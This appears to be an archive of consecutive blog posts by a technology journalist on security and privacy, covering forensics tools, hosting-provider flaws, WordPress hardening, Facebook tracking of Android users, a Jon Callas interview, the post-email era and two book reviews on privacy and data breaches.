A solid toolset is at the core of any successful digital forensics program, an earlier article that I wrote for CSOonline. Although every toolset is different depending on an organization’s needs, some categories should be in all forensics toolkits. In this roundup for CSOonline, I describe some of the more popular tools, many of which are free to download. I have partitioned them into five categories: overall analysis suites (such as the SANS workstation shown here), disk imagers, live CDs, network analysis tools, e-discovery and specialized tools for email and mobile analysis.
If you host your website on GoDaddy, DreamHost, Bluehost, HostGator, OVH or iPage, this blog post is for you. Chances are your site icould be vulnerable to a potential bug or has been purposely infected with something that you probably didn’t know about. Given that millions of websites are involved, this is a moderate big deal.
It used to be that finding a hosting provider was a matter of price and reliability. Now you have to check to see if the vendor actually knows what they are doing. In the past couple of days, I have seen stories such as this one about GoDaddy’s web hosting:
And then there is this post, which talks about the other hosting vendors:
If you use GoDaddy hosting, you should go to your cPanel hosting portal, click on the small three dots at the top of the page (as shown above), click “help us” and ensure you have opted out.
Okay, moving on to the second article, about other hosting provider scripting vulnerabilities. Paulos Yibelo looked at several providers and found multiple issues that differed among them. The issues involved cross-site scripting, cross-site request forgery, man-in-the-middle problems, potential account takeovers and bypass attack vulnerabilities. The list is depressingly long, and Yibelo’s descriptions show each provider’s problems. “All of them are easily hacked,” he wrote. But what was more instructive was the responses he got from each hosting vendor. He also mentions that Bluehost terminated his account, presumably because they saw he was up to no good. “Good job, but a little too late,” he wrote.
Most of the providers were very responsive when reporters contacted them and said these issues have now been fixed. OVH hasn’t yet responded.
So the moral of the story? Don’t assume your provider knows everything, or even anything, about hosting your site, and be on the lookout for similar research. Find a smaller provider that can give you better customer service (I have been using EMWD.com for years and can’t recommend them enough). If you don’t know what some of these scripting attacks are or how they work, go on over to OWASP.org and educate yourself about their basics.
If you run a WordPress blog, you need to get serious about keeping it as secure as possible. WordPress is a very attractive target for hackers for several reasons that I’ll get to in a moment. To help you, I have put together my recommendations for the best ways to secure your site, and many of them won’t cost you much beyond your time to configure them properly. My concern for WordPress security isn’t general paranoia; my own website has been attacked on numerous occasions, including a series of DDoS attacks on Christmas day. I describe how to deploy various tools such as WordFence, shown below and you can read more on CSOonline.
I hope you all had a nice break for the holidays and you are back at work refreshed and ready to go. Certainly, last year hasn’t been the best for Facebook and its disregard for its users’ privacy. But a post that I have lately seen come across my social news feed is blaming them for something that isn’t possible. In other words, it is a hoax. The message goes something like this:
Snopes describes this phony alert here. They say it has been going on for years. And it has gained new life, particularly as the issues surrounding Facebook privacy abuses have increased. So if you see this message from one of your Facebook friends, tell them it is a hoax and nip this in the bud now. You’re welcome.
The phony privacy message could have been motivated by the fact that many of you are contemplating leaving or at least going dark on your social media accounts. Last month saw the departure of several well known thought leaders from the social network, such as Walt Mossberg. I am sure more will follow. As I wrote about this topic last year, I suggested that at the very minimum if you are concerned about your privacy you should at least delete the Facebook Messenger app from your phone and just use the web version.
But even if you leave the premises, it may not be enough to completely cleanse yourself of anything Facebook. This is because of a new research report from Privacy International that is sadly very true. The issue has to do with third-party apps that are constructed from Facebook’s Business Tools. And right now, it seems only Android apps are at issue.
The problem has to do with the APIs that are part of these tools, and how they are used by developers. One of the interfaces specifies a unique user ID value that is assigned to a particular phone or tablet. That ID comes from Google, and is used to track what kind of ads are served up to your phone. This ID is very useful, because it means that different Android apps that are using these Facebook tools all reference the same number. What does this mean for you? Unfortunately, it isn’t good news.
The PI report looked at several different apps, including Dropbox, Shazam, TripAdvisor, Yelp and several others.
If you run multiple apps that have been developed with these Facebook tools, with the right amount of scrutiny your habits can be tracked and it is possible that you could be un-anonymized and identified by the apps you have installed on your phone. That is bad enough, but the PI researchers also found out four additional disturbing things to make matters worse:
First, the tracking ID is created whether you have a Facebook account or not. So even if you have gone full Mossberg and deleted everything, you will still be tracked by Facebook’s computers. It also is created whether your phone is logged into your Facebook account (or using other Facebook-owned products, such as What’sApp) or not.
Second, the tracking ID is created regardless of what you have specified for your privacy settings for each of the third-party apps. The researchers found that the default setting by the Facebook developers for these apps was to automatically transfer data to Facebook whenever a phone’s user opens the app. I say was because Facebook added a “delay” feature to comply with the EU’s GDPR. An app developer has to rebuild their apps with the latest version to employ this feature however. The PI researchers found 61% of the apps they tested automatically send data when they are opened.
Third, some of these third-party apps send a great deal of data to Facebook by design. For example, the Kayak flight search and pricing tool collects a great deal of information about your upcoming travels – this is because it is helping you search for the cheapest or most convenient flights. This data could be used to construct the details about your movements, should a stalker or a criminal wish to target you.
When you put together the tracking ID with some of this collected data, you can find out a lot about whom you are and what you are doing. The PI researchers, for example, found this one user who was running the following apps:
- “Qibla Connect” (a Muslim prayer app),
- “Period Tracker Clue,”
- “Indeed” (a job search app), and
- “My Talking Tom” (a children’s’ app).
This means the user could be potentially profiled as likely a Muslim mother who is looking for a new job. Thinking about this sends a chill up my spine, as it probably does with you. The PI report says, “Our findings also show how routinely and widely users’ Google ad ID is being shared with third parties like Facebook, making it a useful unique identifier that enables third parties to match and link data about an individual’s behavior.”
Finally, the researchers also found that the opt-out methods don’t do anything; the apps continue to share data with Facebook no matter what you have done in your privacy settings, or if you have explicitly sent any opt-out messages to the app’s creators.
Unfortunately, there are a lot of apps that exhibit this behavior: researchers found that Facebook apps are the second most popular tracker, after Google’s parent company Alphabet, for all free apps on the Google Play Store.
So what should you do if you own an Android device? PI has several suggestions:
First, reset your advertising ID regularly by going to Settings > Google > Ads > Reset Advertising ID. Next, go to Settings > Google > Ads > Opt out of personalized advertising to limit these types of ads that leverage your personal data. Next, make sure you update your apps to keep them current. Finally, regularly review the app permissions on your phone and make sure you haven’t granted them anything you aren’t comfortable doing.
Clearly, the real bad news about Facebook is stranger than fiction.
Zimperium is very useful in managing mobile device risks and automating their meditation across the largest enterprise networks.
It includes phishing detection and has the ability to run on both a variety of different cloud infrastructures as well as on-premises. It has deep on-device detection and a fine-grained collection of access roles. It uses a web-based console that controls protection policies and configuration parameters. Reports can be customized as well for management and compliance purposes. I tested the software in December 2018 on a sample network with both Android and iOS devices of varying vintages and profiles.
Pricing decreases based on volume starting at $60/year/device
Keywords: David Strom, web informant, video screencast, mobile device security, mobile device manager, MDM, mobile threat management, Knox security, iOS security
I have known Jon Callas for many years, tracking back to when he was part of the PGP Corporation and bringing encrypted email to the world. He has been a long-time security researcher who has been part of the launch teams at Silent Circle and Blackphone. Recently he has moved from Apple to the ACLU, where he is a technical fellow in the Speech, Privacy and Technology Project.
I spoke to him last week and caught up with what he is working on now, and thought you might be interested. His job now is to help the mostly legal team at ACLU to understand the technical issues, especially from someone who has been deeply steeped in them over the years. “Technology is such a part of the modern world that we need more people to understand it,” he said. One of his focus areas is the recent changes in Australian encryption laws. He is still trying to figure out the implications, and so far he views this bill as more guiding government assistance than actual intervention. The bill also raises more questions than it answers, such as how does a developer secretly insert code into a system that has tracking or build version controls? He is also watching the revelations around the Facebook document trove that was released this week by British lawmakers. (Here is the backstory and ProtonMail’s comments on the law is here.) “Clearly, there are contradictions between what Facebook management said they were and weren’t doing and what was mentioned in these documents,” he said. When I asked him what he what do if he were CTO of Facebook, he just laughed.
One other area of interest is how to understand how the government is acting to curb freedom of speech, and what is going on at our borders. “The government quite reasonably says that they can look inside your suitcase when you cross into our country. That I understand, but shouldn’t your electronic devices be treated differently from what else is in your suitcase? There are many answers here, and we need to have legal and policy discussions and understand exactly what problems we are trying to solve.”
We also spoke about the recent actions by Google employees protesting their Chinese-specific search engine. “I find it encouraging that tech people are looking at the consequences of what they do and where this technology is going to be used and what it all means,” he said. Now, “we are more in tune with privacy concerns. People are thinking about the ethics and consequences of what they are doing. They want to have a part in these discussions. That is what a free society should do.”
It has been 20 years since Marshall Rose and I wrote our book about Internet email. Since then, it has become almost a redundant term: how could you have email without using the Internet? For that matter, how can you have a business without any email to the outside world? It seems unthinkable today.
But for something so essential to modern life, Internet email also comes with multiple ironic situations. I will get to these in a moment.
To do some research for this essay, I re-read a column that I wrote ten years ago about the evolution of email between 1998-2008. Today I want to talk about the last ten years and what we all have been doing during this period. I would call this decade the post email era because email has become the enabling technology for an entire class of applications that previously weren’t possible or weren’t as easy ten years ago. Things like Slack, MFA logins, universal SMS, and the thousands of apps that notify us of their issues using emails. Ironically, all of this has almost eclipsed the actual use of Internet email itself. While ten years ago we had many of these technologies, now they are in more general use. And by post-email I don’t mean that we have stopped using it; quite the contrary. Now it is so embedded in our operations that most of us don’t even think much about it and take it for granted, like the air we breathe. That’s its second irony.
When a new business is being formed, usually the decision for its email provider comes down to hosting email on Google or Microsoft’s servers. That is a big change from ten years ago, when cloud-based email was still being debated and (in some cases) feared. I have been hosting my email on Google’s servers for more than ten years, and many of you have also done the same.
Another change is pricing. This has made email a commodity and it is pretty reasonable: Google charges $5 per month for 30 GB of storage or $10 per month with either 1 TB or unlimited storage. If you want to go with Microsoft, they have similarly priced plans for 1 TB of storage. That is an immense amount of storage. Remember when the first cloud emailers had 1 GB of storage? That seems so quaint — and so limiting — now. For all the talk back then about “inbox zero” (meaning culling messages from your inbox as much as possible), we have enabled email hoarding. That’s another irony.
Apart from all this room to keep our stuff, another major reason for using the cloud is that it frees up the decision as to which email client to run (and to support) for each user. A third reason is that the cloud frees up users to run multiple email clients, depending on what device and for what particular post-email task they want to accomplish. Both of these concepts were pretty radical 20 years ago, and even five years ago they were still not as well accepted as they are now. Today many of us spend more of our time on email with our phones than our desktops, and use multiple programs for our email, and don’t give this a second thought.
Why would anyone want to host their own email server anymore? Here is another irony: one reason is privacy. The biggest thing to happen to email in the past ten years was a growing awareness of how exposed one’s email communications could be. Between Snowden’s revelations and Hillary’s server, it is now crystal clear to the world at large that your email can be read by your government.
When Marshall developed the early email protocols, he didn’t hide this aspect of its operations. It just took the rest of the world many years to catch on. As a result, we now have companies that are deliberating locating in data havens to prevent governments from gaining access to their data streams. Witness ProtonMail and Kolabnow, both doing business from Switzerland, and Mailfence, operating out of Belgium. These companies have picked their locations because they don’t want your email finding its way into the NSA’s Utah data centers, or anywhere else for that matter. And we have articles such as this one in Ars that discuss the issues about Swiss privacy laws. Today a business knows enough to ask where its potential messages will be stored, whether they will be encrypted, and who has control over its encryption keys. That certainly wasn’t in many conversations — or even decisions about selecting an email provider — ten years ago.
One way to take back control over your email is literally to host your own email server so that your message traffic is completely under your control. That has been a difficult proposition even for tech-savvy businesses — until now. This is what Helm is trying to do, and they have put together a sexy little server (about the size of of a small gingerbread house, to keep things festive and seasonal) which can sit on any Internet network anywhere in the world and deliver messages to your inbox. It doesn’t take a lot of technical skill to setup (you use a smartphone app), and it will encrypt all your messages from end-to-end. Helm doesn’t touch them and can’t decrypt them either. Because of this, the one caveat is that you can’t use a webmail client. That is a big tradeoff for many of us that have grown to like webmail over the past decade. Brian Krebs blogged this week that users can pick two items out of security, privacy and convenience. That is the rub. With Helm, you get privacy and security, but not convenience (if you are a webmail user). Irony again: webmail has become so pervasive but you need to go back to running your own server and email desktop clients if you want ironclad security.
Speaking of email encryption, one thing that hasn’t change in the past ten years is how it is rarely used. One of the curiosities of the Snowden revelations was how hard he had to work to find a reporter who was adept enough at using PGP to exchange encrypted messages. Encryption still is hard. And while Protonmail and Tutanova and others (mentioned in this article) have come into play, they are still more curiosities than in widespread general use.
Another trend over the past ten years is how spam and phishing have become bigger problems. This is happening as our endpoints get better at filtering malware out of our inboxes. This is one reason to use hosted Exchange or Gmail: both companies are very good at stopping spam and malicious messages.
It is somewhat of an ironic contradiction: you would hope that better spam processing would make us safer, not more at risk. This risk is easy to explain but hard to prevent. All it takes is just one user on your network, who clicks on one wrong attachment, and a hacker can gain control over your desktop and eventually your entire network. Now that scenario is a common one witnessed in many TV and movie episodes, even in non-sci-fi-themed shows. For example, this summer we had Rihanna as a hacker in Ocean’s 8. Not very realistic, but certainly fun to watch.
So welcome to the many ironies of the post email era. Share your thoughts about how your own email usage has evolved over this past decade if you feel so inclined.
When it comes to protecting your Slack messages, many companies are still flying blind. Slack has become the defacto corporate messaging app, with millions of users and a variety of third-party add-on bots and other apps that can extend its use. It has made inroads into replacing email, which makes sense because it is so immediate like other messaging apps. But it precisely because of its flexibility and ubiquity that makes it more compelling to protect its communications.
In this post for CSOonline, I take a closer look at what is involved in securing your Slack installatio nand some of the questions you’ll want to ask before picking the right vendor’s product. You can see some of the tools that I took a closer look at too in the chart above.
Last week the Electronic Frontier Foundation published an interesting book called The End of Trust. It was published in conjunction with the writing quarterly McSweeneys, which I have long been a subscriber and enjoy its more usual fiction short story collections. This issue is its first total non-fiction effort and it is worthy of your time.
There are more than a dozen interviews and essays from major players in the security, privacy, surveillance and digital rights communities. The book tackles several basic issues: first the fact that privacy is a team sport, as Cory Doctorow opines — meaning we have to work together to ensure it. Second, there are numerous essays about the role of the state in a society that has accepted surveillance, and the equity issues surrounding these efforts. Third, what is the outcome and implications of outsourcing of digital trust. Finally, various authors explore the difference between privacy and anonymity and what this means for our future.
While you might be drawn to articles from notable security pundits, such as an interview where Edward Snowden explains the basics behind blockchain and where Bruce Schneier discusses the gap between what is right and what is moral, I found myself reading other less infamous authors that had a lot to say on these topics.
Let’s start off by saying there should be no “I” in privacy, and we have to look beyond ourselves to truly understand its evolution in the digital age. The best article in the book is an interview with Julia Angwin, who wrote an interesting book several years ago called Dragnet Nation. She says “the word formerly known as privacy is not about individual harm, it is about collective harm. Google and Facebook are usually thought of as monopolies in terms of their advertising revenue, but I tend to think about them in terms of acquiring training data for their algorithms. That’s the thing what makes them impossible to compete with.” In the same article, Trevor Paglen says, “we usually think about Facebook and Google as essentially advertising platforms. That’s not the long-term trajectory of them, and I think about them as extracting-money-out-of-your-life platforms.”
Role of the state
Many authors spoke about the role that law enforcement and other state actors have in our new always-surveilled society. Author Sara Wachter-Boettcher said, “I don’t just feel seen anymore. I feel surveilled.” Thenmozhi Soundararajan writes that “mass surveillance is an equity issue and it cuts across the landscape of race, class and gender.” This is supported by Alvaro Bedoya, the director of a Georgetown Law school think tank. He took issue about the statement that everyone is being watched, because some are watched an awful lot more than others. With new technologies, it is becoming harder to hide in a crowd and thus we have to be more careful about crafting new laws that allow the state access to this data, because we could lose our anonymity in those crowds. “For certain communities (such as LBGTQ), privacy is what lets its members survive. Privacy is what let’s them do what is right when what’s right is illegal. Digital tracking of people’s associations requires the same sort of careful First Amendment analysis that collecting NAACP membership lists in Alabama in the 1960s did. Privacy can be a shield for the vulnerable and is what let’s those first ‘dangerous’ conversations happen.”
Scattered throughout the book are descriptions of various law enforcement tools, such as drones facial recognition systems, license plate readers and cell-phone simulators. While I knew about most of these technologies, collected together in this fashion makes them seem all the more insidious.
Outsourcing our digital trust
Angwin disagrees with the title and assumed premise of the book, saying the point is more about the outsourcing of trust than its complete end. That outsourcing has led to where we prefer to trust data over human interactions. As one example, consider the website Predictim, which scans a potential babysitter or dog walker to determine if they are trustworthy and reliable using various facial recognition and AI algorithms. Back in the pre-digital era, we asked for personal references and interviewed our neighbors and colleagues for this information. Now we have the Internet to vet an applicant.
When eBay was just getting started, they had to build their own trust proxy so that buyers would feel comfortable with their purchases. They came up with early reputation algorithms, which today have evolved into the Uber/Lyft star-rating for their drivers and passengers. Some of the writers in this book mention how Blockchain-based systems could become the latest incarnation for outsourcing trust.
Privacy vs. anonymity
The artist Trevor Paglen says, “we are more interested not so much in privacy as a concept but more about anonymity, especially the political aspects.” In her essay, McGill ethics professor Gabriella Coleman says, “Anonymity tends to nullify accountability, and thus responsibility. Transparency and anonymity rarely follow a binary moral formula, with the former being good and the latter being bad.”
Some authors explore the concept of privacy nihilism, or disconnecting completely from one’s social networks. This was explored by Ethan Zuckerman, who wrote in his essay: “When we think about a data breach, companies tend to think about their data like a precious asset like oil, so breaches are more like oil spills or toxic waste. Even when companies work to protect our data and use it ethically, trusting a platform gives that institution control over your speech. The companies we trust most can quickly become near-monopolies whom we are then forced to trust because they have eliminated their most effective competitors. Facebook may not deserve our trust, but to respond with privacy nihilism is to exit the playing field and cede the game to those who exploit mistrust.” I agree, and while I am not happy about what Facebook has done, I am also sticking with them for the time being too.
This notion of the relative morality of our digital tools is also taken up in a recent NY Times op/ed by NYU philosopher Matthew Liao entitled, Do you have a moral duty to leave Facebook? He says that the social media company has come close to crossing a “red line” but for now he is staying with them.
The book has a section for practical IT-related suggestions to improve your trust and privacy footprint, many of which will be familiar to my readers (MFA, encryption, and so forth). But another article by Douglas Rushkoff goes deeper. He talks about the rise of fake news in our social media feeds and says that it doesn’t matter what side of an issue people are on for them to be infected by the fake news item. This is because the item is designed to provoke a response and replicate. A good example of this is one individual recently mentioned in this WaPost piece who has created his own fake news business out of a parody website here.
Rushkoff recommends three strategies for fighting back: attacking bad memes with good ones, insulating people from dangerous memes via digital filters and the equivalent of AV software, and better education about the underlying issues. None of these are simple.
This morning the news was about how LinkedIn harvested 18M emails from to target ads to recruit people to join its social network. What is chilling about this is how all of these email addresses were from non-members that it had collected, of course without their permission.
You can go to the EFF link above where you can download a PDF copy or go to McSweeneys and buy the hardcover book. Definitely worth reading.
A new book from Professor Josephine Wolff at Rochester Inst. of Technology called You’ll see this message when it is too late is worth reading. While there are plenty of other infosec books on the market, to my knowledge this is first systematic analysis of different data breaches over the past decade.
She reviews a total of nine major data breaches of the recent past and classifies them into three different categories, based on the hackers’ motivations; those that happened for financial gain (TJ Maxx and the South Carolina Department of Revenue and various ransomware attacks); for cyberespionage (DigiNotar and US OPM) and online humiliation (Sony and Ashley Madison). She takes us behind the scenes of how the breaches were discovered, what mistakes were made and what could have been done to mitigate the situation.
A lot has been already written on these breaches, but what sets Wolff’s book apart is that she isn’t trying to assign blame but dive into their root causes and link together various IT and corporate policy failures that led to the actual breach.
There is also a lot of discussion about how management is often wrong about these root causes or the path towards mitigation after the breach is discovered. For example, then-South Carolina governor Nikki Haley insisted that if only the IRS had told them to encrypt their stolen tax data, they would have been safe. Wolff then describes what the FBI had to do to fight the Zeus botnet, where its authors registered thousands of domain names in advance of each campaign, generating new ones for each attack. The FBI ended up working with security researchers to figure out the botnet’s algorithms and be able to shut down the domains before they could be used by the attackers. This was back in 2012, when such partnerships between government and private enterprise were rare. This collaboration also happened in 2014 when Sony was hacked.
Another example of management security hubris can be found with the Ashley Madison breach, where its managers touted how secure its data was and how your profiles could be deleted with confidence — both promises were far from the truth as we all later found out.
The significance of some of these attacks weren’t appreciated until much later. For example, the attack on the Dutch registrar DigiNotar’s certificate management eventually led to its bankruptcy. But more importantly, it demonstrated that a small security flaw could have global implications, and undermine overall trust in the Internet and compromise hundreds of thousands of Iranian email accounts. To this day, most Internet users still don’t understand the significance in how these certificates are created and vetted.
Wolff mentions that “finding a way into a computer system to steal data is comparatively easy. Finding a way to monetize that data can be much harder.” Yes, mistakes were made by the breached parties she covers in this book. “But there were also potential defenders who could have stepped in to detect or stop certain stages of these breaches.” This makes the blame game more complex, and shows that we must consider the entire ecosystem and understand where the weak points lie.
Yes, TJ Maxx could have provided stronger encryption for its wireless networks; South Carolina DoR could have used MFA; DigiNotar could have segmented its network more effectively and set up better intrusion prevention policies; Sony could have been tracking exported data from its network; OPM could have encrypted its personnel files; Ashley Madison could have done a better job with protecting its database security and login credentials. But nonetheless, it is still difficult to define who was really responsible for these various breaches.
For corporate security and IT managers, this book should be required reading.